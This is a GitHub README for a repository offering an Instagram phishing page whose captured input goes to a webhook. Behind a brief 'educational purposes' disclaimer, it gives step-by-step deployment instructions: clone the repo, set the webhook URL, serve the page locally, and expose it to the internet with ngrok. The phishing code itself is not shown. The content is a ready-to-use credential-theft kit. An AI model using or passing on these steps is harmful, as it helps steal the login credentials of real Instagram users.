/ultimate-ig-webhook-phishing

A simple but complete instagram phishing page with webhook output. Only for educational purpuses!! (Solo con fines educativos y de demostración)

Primary LanguageCSS

Ultimate Instagram Phishing!!

Disclaimer: This is ONLY for educational purposes.

Use

  • Clone this repository:
git clone https://github.com/antonchu2006/ultimate-ig-webhook-phishing.git
cd ultimate-ig-webhook-phishing
  • Change webhook URL in index.js

  • Start a http web in the directory (or move repository files to apache / xampp / wampp html folder)

python3 -m http.server
  • Open webserver port OR start ngrok
./ngrok http <webserver port>
  • Check if it works!